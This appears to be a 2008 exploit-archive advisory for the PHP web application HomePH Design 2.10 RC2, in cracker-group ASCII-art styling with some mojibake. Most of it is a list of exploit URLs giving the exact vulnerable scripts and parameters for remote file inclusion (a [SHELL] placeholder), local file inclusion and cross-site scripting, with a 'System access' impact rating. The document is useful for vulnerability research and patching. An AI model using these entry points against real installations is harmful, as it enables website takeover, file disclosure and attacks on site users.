HomePH Design 2.10 RC2 (RFI-LFI-XSS) Multiple Vulnerabilities
2008-06-22 00:00:00┌┌───────────────────────────────────────────────────────────────────────────â”
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────â”
┌┌───────────────────────────────────────────────────────────────────────────â”
┌┘ [ Remote File Include ] [ Local File Include ] [XSS] ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr : : :
│ Group : uNiTeD CraCkiNg ForCE │ │ │
│ Script : HomePH Design 2.10 RC2 │ │ Register Globals : │
│ Download : SourceForge.net │ │ │
│ Method : GET │ │ [█] ON [ ] OFF │
│ Critical : High [░░▒▒▓▓██] │ │ │
│ Impact : System access │ │ │
│ ────────────────────────────────────┘ └─────────────────────────────────── │
│ DALnet #crackers ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ â•â•â•â•â•â•â•â•â•â•â•â•â• │
│ Typically used for remotely exploitable vulnerabilities that can lead to │
│ system compromise. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────â”
┌┘ Exploit URL's ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
[RFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]
[LFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]
[XSS]
http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]
Notes: More files are infected.
â•â•â•â•â•
└────────────────────────────────────────────────────────────────────────────┘
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
┌┌───────────────────────────────────────────────────────────────────────────â”
┌┘ © CraCkEr 2008 ┌┘
└───────────────────────────────────────────────────────────────────────────┘┘
#
Fixes
No fixesIn order to submit a new fix you need to be registered.